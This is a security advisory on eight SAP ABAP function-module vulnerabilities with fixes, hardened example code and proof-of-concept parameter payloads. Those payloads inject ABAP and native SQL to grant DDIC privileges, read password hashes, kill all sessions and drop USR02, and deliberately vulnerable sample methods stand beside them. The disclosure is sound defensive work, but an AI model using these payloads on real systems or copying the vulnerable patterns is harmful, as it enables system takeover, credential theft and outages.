Vendor description:
"SAP is a market share leader in enterprise resource planning (ERP), analytics, supply chain management, human capital management, master data management, data integration as well as in experience management" [1]. Customers comprise 92% of the Forbes Global 2000 companies and 98% of the 100 most valued brands. 77% of the world’s transaction revenue touches an SAP system [1, 2].
"SAP NetWeaver Application Server for ABAP (AS ABAP) is a platform on which important business processes run. It provides a complete development and runtime environment for ABAP-based applications. The purpose of AS ABAP is to provide programmers with an efficient means of expressing business logic and relieve them from the necessity of platform-related and purely technical coding. AS ABAP is therefore a basis for all ABAP systems" [3].
"The [successor] ABAP platform provides a reliable and scalable server and programming environment for modern ABAP development [...]. The ABAP platform offers support for SAP HANA and SAP Fiori and allows developers to efficiently build enterprise software that meets the requirements of their business scenarios – on-premise as well as in the cloud" [4].
[1] https://www.sap.com/about/company.html
[2] https://www.sap.com/documents/2017/04/4666ecdd-b67c-0010-82c7-eda71af511fa.html
[4] https://developers.sap.com/topics/abap-platform.html
Business recommendation
By exploiting the vulnerabilities documented in this advisory, privileged attackers can take complete control of affected application servers. Thus, successful exploitation can enable fraud, sabotage or data theft while affecting confidentiality, integrity, and availability of business data.
SEC Consult recommends implementing SAP security notes 2958563, 2973735, 2993132, 2986980, 2999854, 3002517 and 3048657, which, according to the vendor, fix the documented issues. We advise installing the corrections as a matter of priority to keep business-critical data secured.
Vulnerability overview/description
Advanced Business Application Programming (ABAP)® is a proprietary programming language by SAP SE. In common with every other programming language, ABAP can be susceptible to software vulnerabilities ranging from missing or improper authorization checks to inadequate input validation and output sanitization. Of particular concern are injection vulnerabilities, which can jeopardize the overall system security.
Remote Function Call (RFC) is a proprietary network protocol by SAP SE. SAP systems ship with thousands of built-in function modules implemented in ABAP; those flagged as remote-enabled form an interface comparable to an application programming interface (API) that RFC exposes over the network. This makes it possible to decentralize business applications even across system boundaries. External programs and clients can use RFC connections to interact with an SAP system via libraries (e.g. the NW RFC SDK) provided by SAP SE.
This advisory covers multiple critical vulnerabilities discovered in the ABAP® coding of standard function modules. These are part of different software components that build upon the bedrock products SAP® Application Server ABAP and ABAP® Platform.
1) [CVE-2020-6318] Code Injection Vulnerability in SAP NetWeaver (ABAP Server) and ABAP Platform
Function modules RSDU_LIST_DB_TABLE_SYB and RSDU_LIST_DB_TABLE_DB4 of function groups RSDU_UTIL_SYB and RSDU_CORE_UTIL_DB4 are vulnerable to ABAP code injection bugs that allow arbitrary ABAP code to be executed. Successful exploitation leads to full system compromise.
2) [CVE-2020-26808] Code Injection Vulnerability in SAP AS ABAP and S/4 HANA (DMIS)
Function module CNV_MBT_SEL_STRING_RETURN of function group CNV_MBT_SEL is vulnerable to an ABAP code injection bug that allows arbitrary code to be embedded in the ABAP Repository. An attacker can abuse this bug by invoking the function remotely via the RFC protocol. Successful exploitation leads to full system compromise.
3) [CVE-2020-26832] Missing Authorization Check in SAP NetWeaver AS ABAP and SAP S4 HANA (SAP Landscape Transformation)
Function module CNV_GET_USERS_FOR_APP_SERVER of function group CNV_00001_HELP does not perform any programmatically implemented authorization check. An attacker can abuse this bug by invoking the function remotely via the RFC protocol. Successful exploitation allows an attacker to retrieve internal information and to make the targeted SAP system completely unavailable to its intended users; the latter constitutes a Denial of Service (DoS) attack.
4) [CVE-2021-21468] Missing Authorization Check in SAP Business Warehouse (Database Interface)
Function module RSDL_DB_GET_DATA_BWS of function group RSDL does not perform any programmatically implemented authorization check. An attacker can abuse this bug by invoking the function remotely via the RFC protocol. Successful exploitation allows the entire database to be read, including data of other clients (cross-client access).
5) [CVE-2021-21465] Native SQL Injection Vulnerability in SAP Business Warehouse (Database Interface)
Function module RSDL_DB_GET_DATA_BWS of function group RSDL is vulnerable to a native SQL injection (ADBC) bug that allows arbitrary SQL commands to be executed at database level. An attacker can abuse this bug by invoking the function remotely via the RFC protocol. Successful exploitation leads to full system compromise.
6) [CVE-2021-21466] Code Injection Vulnerability in SAP Business Warehouse and SAP BW/4HANA
Function module RSDRI_DF_TEXT_READ of function group RSDRI_DF_FACADE is vulnerable to an ABAP code injection bug that allows arbitrary code to be embedded in the ABAP Repository. An attacker can abuse this bug by invoking the function remotely via the RFC protocol. Successful exploitation leads to full system compromise.
7) [CVE-2021-21473] Missing Authorization Check in SAP NetWeaver AS ABAP and ABAP Platform
Function module SRM_RFC_SUBMIT_REPORT of function group SRM_REP does not enforce proper authorization checks for a security-critical dynamic program call. An attacker can abuse this bug by invoking the function remotely via the RFC protocol. Successful exploitation allows an attacker to execute existing ABAP reports without holding sufficient authorizations.
8) [CVE-2021-33678] Code Injection vulnerability in SAP NetWeaver AS ABAP (Reconciliation Framework)
Function module CONVERT_FROM_CHAR_SORT_RFW of function group FG_RFW contains a code injection vulnerability with a limited exploitation primitive. An attacker can abuse this bug to drop critical system tables (e.g. USR02), making the targeted SAP system completely unavailable to its intended users.
Proof of concept
1) [CVE-2020-6318] Code Injection Vulnerability in SAP NetWeaver (ABAP Server) and ABAP Platform
The vulnerable functions use the GENERATE SUBROUTINE POOL statement on source code that is assembled dynamically from untrusted user input. As there is no input validation or output sanitization, an attacker can inject malicious ABAP code through specific import parameters. The generated code is compiled and executed on the fly by the application server while the functions run.
The following payload exploits the bug to escalate privileges via reference user assignment:
Import Parameter: I_TABLNM
Value: USR02
Import Table: I_T_SELECT_FIELDS
╒═══════════════════════════════════════════════════════════════╕
│ RSD_FIELDNM │
╞═══════════════════════════════════════════════════════════════╡
│ BNAME │
╘═══════════════════════════════════════════════════════════════╛
Import Table: I_T_WHERE_COND
╒═══════════╤══════╤════════════════════════════════════════════╕
│ FIELDNM │ OP │ LOW │
╞═══════════╪══════╪════════════════════════════════════════════╡
│ BNAME │ EQ │ S'ENDEXEC. EXEC SQL.UPDATE USREFUS SET │
│ │ │ REFUSER = 'DDIC' WHERE BNAME = 'ATTACKER │
╘═══════════╧══════╧════════════════════════════════════════════╛
2) [CVE-2020-26808] Code Injection Vulnerability in SAP AS ABAP and S/4 HANA (DMIS)
The vulnerable function uses the INSERT REPORT statement on source code that is assembled dynamically from untrusted user input. As there is no input validation or output sanitization, an attacker can inject malicious ABAP code through specific import parameters. The inserted code can then be executed by chaining this bug with CVE-2021-21473.
The following payload exploits the bug to escalate privileges via reference user assignment:
Import Parameter: TABNAME
Value: USR02
Import Table: IMT_SELSTRING
╒══════════════════════════════════════════════════════════════╕
│ LINE │
╞══════════════════════════════════════════════════════════════╡
│ BNAME = 'TEST'. ENDSELECT. │
├──────────────────────────────────────────────────────────────┤
│ UPDATE USREFUS SET REFUSER = 'DDIC' WHERE BNAME = 'ATTACKER' │
├──────────────────────────────────────────────────────────────┤
│ SELECT * FROM USR02 │
╘══════════════════════════════════════════════════════════════╛
3) [CVE-2020-26832] Missing Authorization Check in SAP NetWeaver AS ABAP and SAP S4 HANA (SAP Landscape Transformation)
The vulnerable function does not perform any explicit authorization check. Depending on the import parameter MODE, it calls the kernel function 'ThUsrInfo' with opcode 02, which lists the active logon sessions, or with opcode 25, which terminates all active logon sessions. Invoking the function periodically effectively prevents users from working on the application server.
The following payload exploits the bug to trigger the information disclosure and enumerate active user sessions:
Import Parameter: MODE
Value: 1
The following payload exploits the bug to terminate all active user sessions:
Import Parameter: MODE
Value: 2
4) [CVE-2021-21468] Missing Authorization Check in SAP Business Warehouse (Database Interface)
The vulnerable function does not perform any explicit authorization check. It uses classes and methods of the ABAP Database Connectivity (ADBC) framework to execute native SQL queries at database level. Depending on the import parameters, this allows arbitrary table data to be read, including user master records and secure storage tables (e.g. RSECTAB).
The following payload exploits the bug to exfiltrate user password hashes:
Import Table: I_S_TABSEL
╒══════════════════════════════════════════════════════════════╕
│ NAME │
╞══════════════════════════════════════════════════════════════╡
│ USR02 │
╘══════════════════════════════════════════════════════════════╛
Import Table: I_S_DBCON
╒══════════════════════════════════════════════════════════════╕
│ CON_NAME │
╞══════════════════════════════════════════════════════════════╡
│ <Database Connection String> (e.g. DEFAULT) │
╘══════════════════════════════════════════════════════════════╛
Import Table: I_T_DBFIELDS
╒═══════════════╤═════════╤════════════════════════════════════╕
│ NAME │ TYPE │ LENGTH │
╞═══════════════╪═════════╪════════════════════════════════════╡
│ BNAME │ CHAR255 │ 000255 │
├───────────────┼─────────┼────────────────────────────────────┤
│ PWDSALTEDHASH │ CHAR255 │ 000255 │
╘═══════════════╧═════════╧════════════════════════════════════╛
5) [CVE-2021-21465] Native SQL Injection Vulnerability in SAP Business Warehouse (Database Interface)
The vulnerable function does not perform any input validation or output sanitization on the import parameters that are used to build the WHERE condition of the native SQL statement. This allows arbitrary SQL commands to be injected, which are executed natively at database level while the function runs.
The following payload exploits the bug to escalate privileges via reference user assignment:
Import Table: I_S_TABSEL
╒══════════════════════════════════════════════════════════════╕
│ NAME │
╞══════════════════════════════════════════════════════════════╡
│ USR02 │
╘══════════════════════════════════════════════════════════════╛
Import Table: I_S_DBCON
╒══════════════════════════════════════════════════════════════╕
│ CON_NAME │
╞══════════════════════════════════════════════════════════════╡
│ <Database Connection String> (e.g. DEFAULT) │
╘══════════════════════════════════════════════════════════════╛
Import Table: I_T_DBFIELDS
╒═══════════════╤═════════╤════════════════════════════════════╕
│ NAME │ TYPE │ LENGTH │
╞═══════════════╪═════════╪════════════════════════════════════╡
│ BNAME │ CHAR255 │ 000255 │
╘═══════════════╧═════════╧════════════════════════════════════╛
Import Table: I_T_SELECT
╒══════════════════════╤════════╤══════════════════════════════╕
│ FIELDNM │ OPTION │LOW │
╞══════════════════════╪════════╪══════════════════════════════╡
│ BNAME │ EQ │'';UPDATE USREFUS SET REFUSER │
│ │ │='DDIC' WHERE '1 │
├──────────────────────┼────────┼──────────────────────────────┤
│ ' = '1 AND' AND BNAME│ EQ │'ATTACKER'; │
╘══════════════════════╧════════╧══════════════════════════════╛
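Items 4) and 5) share one code path: caller-controlled identifiers and values are pasted into a native SQL string that ADBC hands to the database. The following reader is added here as an example and is not code from SAP or SEC Consult (the class lcl_adbc_reader, its parameter names and the package ZAPP are hypothetical); it puts that pattern next to a hardened variant with an explicit S_TABU_NAM check, validated identifiers and the condition value bound as a statement parameter.

```abap
" Added example (hypothetical code, neither SAP's nor SEC Consult's): reading
" one column of one table through ADBC, in a vulnerable and a hardened form.
CLASS lcx_no_auth DEFINITION INHERITING FROM cx_static_check.
ENDCLASS.

TYPES: BEGIN OF ty_val,
         val TYPE c LENGTH 255,   " same binding type the page's interface uses (CHAR255)
       END OF ty_val,
       ty_val_tab TYPE STANDARD TABLE OF ty_val WITH DEFAULT KEY.

CLASS lcl_adbc_reader DEFINITION.
  PUBLIC SECTION.
    " VULNERABLE: table, column and condition value are pasted into native SQL.
    CLASS-METHODS read_unsafe
      IMPORTING iv_con           TYPE dbcon_name
                iv_table         TYPE tabname
                iv_field         TYPE fieldname
                iv_key_field     TYPE fieldname
                iv_value         TYPE string
      RETURNING VALUE(rt_values) TYPE ty_val_tab
      RAISING   cx_sql_exception cx_parameter_invalid.
    " HARDENED: S_TABU_NAM check, validated identifiers, bound value.
    CLASS-METHODS read_safe
      IMPORTING iv_con           TYPE dbcon_name
                iv_table         TYPE tabname
                iv_field         TYPE fieldname
                iv_key_field     TYPE fieldname
                iv_value         TYPE string
      RETURNING VALUE(rt_values) TYPE ty_val_tab
      RAISING   lcx_no_auth cx_abap_not_a_table cx_abap_not_in_package
                cx_abap_invalid_name cx_sql_exception cx_parameter_invalid.
ENDCLASS.

CLASS lcl_adbc_reader IMPLEMENTATION.
  METHOD read_unsafe.
    DATA(lo_con)  = cl_sql_connection=>get_connection( con_name = iv_con ).
    DATA(lo_stmt) = NEW cl_sql_statement( con_ref = lo_con ).
    " iv_value = '';UPDATE USREFUS SET REFUSER='DDIC' WHERE '1' = '1  (see 5) above)
    " ends up verbatim in the statement text.
    DATA(lo_rs) = lo_stmt->execute_query(
      |SELECT { iv_field } FROM { iv_table } WHERE { iv_key_field } = '{ iv_value }'| ).
    lo_rs->set_param_table( REF #( rt_values ) ).
    lo_rs->next_package( ).
    lo_rs->close( ).
  ENDMETHOD.

  METHOD read_safe.
    " 1) Authorization: the caller needs display access to this table.
    AUTHORITY-CHECK OBJECT 'S_TABU_NAM'
      ID 'TABLE' FIELD iv_table
      ID 'ACTVT' FIELD '03'.
    IF sy-subrc <> 0.
      RAISE EXCEPTION TYPE lcx_no_auth.
    ENDIF.
    " 2) Identifiers cannot be bound, so they are validated: an existing DDIC
    "    table from an allowed package (ZAPP is a hypothetical restriction) and
    "    syntactically valid column names (letters, digits, underscore only).
    DATA(lv_table) = cl_abap_dyn_prg=>check_table_name_str(
                       val = to_upper( iv_table ) packages = `ZAPP` ).
    DATA(lv_field) = cl_abap_dyn_prg=>check_column_name( to_upper( iv_field ) ).
    DATA(lv_key)   = cl_abap_dyn_prg=>check_column_name( to_upper( iv_key_field ) ).
    " 3) Values are bound, never concatenated: the quote-and-semicolon payload
    "    is compared as data against the key column and matches nothing.
    DATA lv_value  TYPE c LENGTH 255.
    DATA lv_client TYPE sy-mandt.
    lv_value  = iv_value.
    lv_client = sy-mandt.
    DATA(lo_con)  = cl_sql_connection=>get_connection( con_name = iv_con ).
    DATA(lo_stmt) = NEW cl_sql_statement( con_ref = lo_con ).
    lo_stmt->set_param( REF #( lv_client ) ).
    lo_stmt->set_param( REF #( lv_value ) ).
    " Native SQL bypasses automatic client handling, so MANDT is restricted
    " explicitly (assumes a client-dependent table).
    DATA(lo_rs) = lo_stmt->execute_query(
      |SELECT { lv_field } FROM { lv_table } WHERE mandt = ? AND { lv_key } = ?| ).
    lo_rs->set_param_table( REF #( rt_values ) ).
    lo_rs->next_package( ).
    lo_rs->close( ).
  ENDMETHOD.
ENDCLASS.
```

Letting the caller choose the DBCON entry (iv_con) is kept only to mirror the interface in 4) and 5); a service that genuinely needs several connections should map a short, fixed set of names to connections itself. Which packages and which S_TABU_NAM activity are appropriate is a design decision for the implementer, and the cl_abap_dyn_prg methods used here are assumed to be present on the target release.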
6) [CVE-2021-21466] Code Injection Vulnerability in SAP Business Warehouse and SAP BW/4HANA
The vulnerable function uses the INSERT REPORT statement on source code that is assembled dynamically from untrusted user input. As there is no input validation or output sanitization, an attacker can inject malicious ABAP code through specific import parameters. The inserted code can then be executed by chaining this bug with CVE-2021-21473.
The following payload exploits the bug to escalate privileges via reference user assignment:
Import Parameter: I_TABLE_NAME
Value: INJECTION
Import Parameter: I_DEBUG_SUFFIX
Value: SAP
Import Table: I_T_RANGE_STRING
╒═══════════╤═════════════════════════════════════╤════════════╕
│ CHANM │ LOW │ HIGH │
╞═══════════╪═════════════════════════════════════╪════════════╡
│ BNAME │ '. UPDATE USREFUS SET REFUSER │ '. EXIT. " │
│ │ = 'DDIC' WHERE BNAME = 'ATTACKER │ │
╘═══════════╧═════════════════════════════════════╧════════════╛
7) [CVE-2021-21473] Missing Authorization Check in SAP NetWeaver AS ABAP and ABAP Platform
The vulnerable function passes a dynamically generated program name (built from untrusted data) to a SUBMIT statement. No authorization checks are enforced programmatically. Thus, a remote attacker without the corresponding authorizations can use this function to start any existing ABAP report by supplying its name in the import parameter REPORTNAME.
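The following added example, which is not code from SAP or SEC Consult (lcl_report_runner and the report names ZREP_STOCK_OVERVIEW and ZREP_OPEN_ORDERS are hypothetical), shows the dynamic SUBMIT from 7) next to a variant that restricts the name to an allow-list, verifies that it is an executable program and checks S_PROGRAM against the report's authorization group before starting it.

```abap
" Added example (hypothetical code, neither SAP's nor SEC Consult's): starting a
" report whose name arrives from an RFC caller, vulnerable vs. hardened.
CLASS lcx_no_auth DEFINITION INHERITING FROM cx_static_check.
ENDCLASS.

CLASS lcl_report_runner DEFINITION.
  PUBLIC SECTION.
    " VULNERABLE: whatever name the caller sends is started.
    CLASS-METHODS submit_unsafe
      IMPORTING iv_report TYPE syrepid.
    " HARDENED: allow-list, executable program only, explicit S_PROGRAM check.
    CLASS-METHODS submit_safe
      IMPORTING iv_report TYPE syrepid
      RAISING   lcx_no_auth cx_abap_not_in_whitelist.
ENDCLASS.

CLASS lcl_report_runner IMPLEMENTATION.
  METHOD submit_unsafe.
    " No check of the caller's authorizations: any existing program name runs.
    SUBMIT (iv_report) AND RETURN.
  ENDMETHOD.

  METHOD submit_safe.
    DATA lv_prog TYPE syrepid.
    " 1) Only reports this service is meant to expose (hypothetical names).
    DATA(lt_allowed) = VALUE string_table( ( `ZREP_STOCK_OVERVIEW` )
                                           ( `ZREP_OPEN_ORDERS` ) ).
    lv_prog = cl_abap_dyn_prg=>check_whitelist_tab(
                val = to_upper( iv_report ) whitelist = lt_allowed ).
    " 2) Must exist and be an executable program (TRDIR-SUBC = '1'), not an
    "    include, function group, class pool or module pool.
    SELECT SINGLE subc, secu FROM trdir
      WHERE name = @lv_prog
      INTO ( @DATA(lv_subc), @DATA(lv_secu) ).
    IF sy-subrc <> 0 OR lv_subc <> '1'.
      RAISE EXCEPTION TYPE lcx_no_auth.
    ENDIF.
    " 3) Explicit S_PROGRAM check against the report's authorization group.
    "    A report without a group is not protected by S_PROGRAM at all, so
    "    such reports are refused here rather than started.
    IF lv_secu IS INITIAL.
      RAISE EXCEPTION TYPE lcx_no_auth.
    ENDIF.
    AUTHORITY-CHECK OBJECT 'S_PROGRAM'
      ID 'P_GROUP'  FIELD lv_secu
      ID 'P_ACTION' FIELD 'SUBMIT'.
    IF sy-subrc <> 0.
      RAISE EXCEPTION TYPE lcx_no_auth.
    ENDIF.
    SUBMIT (lv_prog) AND RETURN.
  ENDMETHOD.
ENDCLASS.
```

The allow-list alone already closes the bug in 7); the TRDIR and S_PROGRAM checks are defence in depth for the day someone adds a report to the list without assigning it an authorization group.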
8) [CVE-2021-33678] Code Injection vulnerability in SAP NetWeaver AS ABAP (Reconciliation Framework)
The vulnerable function uses the GENERATE SUBROUTINE POOL statement in the subroutine (FORM) get_dynamic_fields on source code that is assembled dynamically from untrusted user input. As there is no input validation or output sanitization, an attacker can inject malicious ABAP code through specific import parameters. Because of their data types, these parameters are limited in length, which constrains the payload an attacker can deliver. It is still possible, for example, to drop critical system tables by exploiting this bug.
The following payload exploits the bug to drop table USR02, leading to a complete loss of availability of the target system:
Import Parameter: RTABNAME
Value: X. EXEC SQL. DROP TABLE USR02-
Import Parameter: RFIELDNAME
Value: ENDEXEC
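The GENERATE SUBROUTINE POOL pattern behind 1) and 8) and the INSERT REPORT pattern behind 2) and 6) share one root cause: data from the RFC caller becomes ABAP source. The following example is added here and is not code from SAP or SEC Consult (lcl_dyn_select, the ty_where structure and the package ZAPP are hypothetical); it contrasts that pattern with a variant that validates every fragment with cl_abap_dyn_prg and does not generate code at all.

```abap
" Added example (hypothetical code, neither SAP's nor SEC Consult's): a row
" count with caller-supplied table and WHERE fragments, vulnerable vs. hardened.
CLASS lcx_no_auth DEFINITION INHERITING FROM cx_static_check.
ENDCLASS.

TYPES: BEGIN OF ty_where,
         fieldnm TYPE fieldname,   " column name, like I_T_WHERE_COND-FIELDNM
         op      TYPE char2,       " EQ, NE, GT, GE, LT, LE
         low     TYPE string,      " comparison value from the caller
       END OF ty_where,
       ty_where_tab TYPE STANDARD TABLE OF ty_where WITH DEFAULT KEY.

CLASS lcl_dyn_select DEFINITION.
  PUBLIC SECTION.
    " VULNERABLE: fragments are pasted into ABAP source that is then generated.
    CLASS-METHODS count_rows_unsafe
      IMPORTING iv_table        TYPE tabname
                it_where        TYPE ty_where_tab
      RETURNING VALUE(rv_count) TYPE i.
    " HARDENED: authorization check, validated fragments, no code generation.
    CLASS-METHODS count_rows_safe
      IMPORTING iv_table        TYPE tabname
                it_where        TYPE ty_where_tab
      RETURNING VALUE(rv_count) TYPE i
      RAISING   lcx_no_auth cx_abap_not_a_table cx_abap_not_in_package
                cx_abap_invalid_name cx_abap_not_in_whitelist.
ENDCLASS.

CLASS lcl_dyn_select IMPLEMENTATION.
  METHOD count_rows_unsafe.
    DATA: lt_src  TYPE TABLE OF string,
          lv_cond TYPE string,
          lv_prog TYPE syrepid,
          lv_msg  TYPE string.
    LOOP AT it_where INTO DATA(ls_where).
      " LOW = '. UPDATE USREFUS SET REFUSER = 'DDIC' WHERE BNAME = 'ATTACKER
      " closes the literal and the SELECT; the rest is compiled as ABAP.
      lv_cond = COND string( WHEN lv_cond IS INITIAL THEN `` ELSE |{ lv_cond } AND | )
             && |{ ls_where-fieldnm } { ls_where-op } '{ ls_where-low }'|.
    ENDLOOP.
    lt_src = VALUE #( ( `PROGRAM zdyn_count.` )
                      ( `FORM count CHANGING p_count TYPE i.` )
                      ( |  SELECT COUNT( * ) FROM { iv_table } INTO p_count WHERE { lv_cond }.| )
                      ( `ENDFORM.` ) ).
    GENERATE SUBROUTINE POOL lt_src NAME lv_prog MESSAGE lv_msg.
    IF sy-subrc = 0.
      PERFORM count IN PROGRAM (lv_prog) CHANGING rv_count.
    ENDIF.
  ENDMETHOD.

  METHOD count_rows_safe.
    DATA: lv_cond TYPE string,
          lv_comp TYPE abap_compname.
    " 1) Explicit authorization: display access to the requested table.
    AUTHORITY-CHECK OBJECT 'S_TABU_NAM'
      ID 'TABLE' FIELD iv_table
      ID 'ACTVT' FIELD '03'.
    IF sy-subrc <> 0.
      RAISE EXCEPTION TYPE lcx_no_auth.
    ENDIF.
    " 2) Table must exist in the DDIC and lie in an allowed package
    "    (ZAPP is a hypothetical restriction; list what the service may expose).
    DATA(lv_table)  = cl_abap_dyn_prg=>check_table_name_str(
                        val = to_upper( iv_table ) packages = `ZAPP` ).
    DATA(lo_struct) = CAST cl_abap_structdescr(
                        cl_abap_typedescr=>describe_by_name( lv_table ) ).
    DATA(lt_ops)    = VALUE string_table( ( `EQ` ) ( `NE` ) ( `GT` ) ( `GE` ) ( `LT` ) ( `LE` ) ).
    LOOP AT it_where INTO DATA(ls_where).
      " 3) Column: syntactically a column name and a component of this table.
      DATA(lv_col) = cl_abap_dyn_prg=>check_column_name( to_upper( ls_where-fieldnm ) ).
      lv_comp = lv_col.
      IF NOT line_exists( lo_struct->components[ name = lv_comp ] ).
        RAISE EXCEPTION TYPE cx_abap_invalid_name.
      ENDIF.
      " 4) Operator: one of a fixed set.
      DATA(lv_op)  = cl_abap_dyn_prg=>check_whitelist_tab(
                       val = to_upper( ls_where-op ) whitelist = lt_ops ).
      " 5) Value: quotes doubled, so the literal cannot be closed from inside;
      "    the payload above becomes the inert literal '''. UPDATE ... ''ATTACKER'.
      DATA(lv_val) = cl_abap_dyn_prg=>escape_quotes( ls_where-low ).
      lv_cond = COND string( WHEN lv_cond IS INITIAL THEN `` ELSE |{ lv_cond } AND | )
             && |{ lv_col } { lv_op } '{ lv_val }'|.
    ENDLOOP.
    " 6) Dynamic Open SQL instead of generated ABAP: a malformed condition is a
    "    catchable CX_SY_DYNAMIC_OSQL_SYNTAX error, never executed code.
    SELECT COUNT( * ) FROM (lv_table) INTO rv_count WHERE (lv_cond).
  ENDMETHOD.
ENDCLASS.
```

Fed the I_T_RANGE_STRING payload from 6), the unsafe variant compiles a line of the form WHERE BNAME EQ ''. UPDATE USREFUS SET REFUSER = 'DDIC' WHERE BNAME = 'ATTACKER'. and runs the UPDATE; the safe variant turns the same input into a string literal that matches no row. Where code generation is genuinely unavoidable, the same per-fragment checks still apply, and the generated program should never receive a value that has not passed escape_quotes or a whitelist. The cl_abap_dyn_prg methods used here are assumed to be available on the target release.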